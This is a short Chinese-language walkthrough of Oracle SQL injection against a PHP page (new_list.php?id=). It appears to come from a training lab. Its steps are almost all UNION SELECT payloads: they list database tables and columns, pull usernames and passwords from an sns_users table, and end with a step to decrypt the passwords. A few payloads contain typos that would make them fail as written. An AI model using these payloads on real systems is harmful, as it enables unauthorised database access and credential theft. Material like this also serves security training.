1.判断注入点
2.用order by判断列数
3.用联合查询获取显错点
new_list.php?id=-1 union select 'null','null' from dual
4.查看版本信息
new_list.php?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual
5.查询当前数据库库名
new_list.php?id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual
6查询数据库表名
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name notin'LOGMNR_GLOBAL$') from dual
new_list.php?id=-1 union select 'null',(select table_name from user_tableswhere rownum=1) from dual
7.查询数据库列名
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name<> 'USER_NAME') from dual
8.获取账号密码字段内容
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'
9.对密码进行解密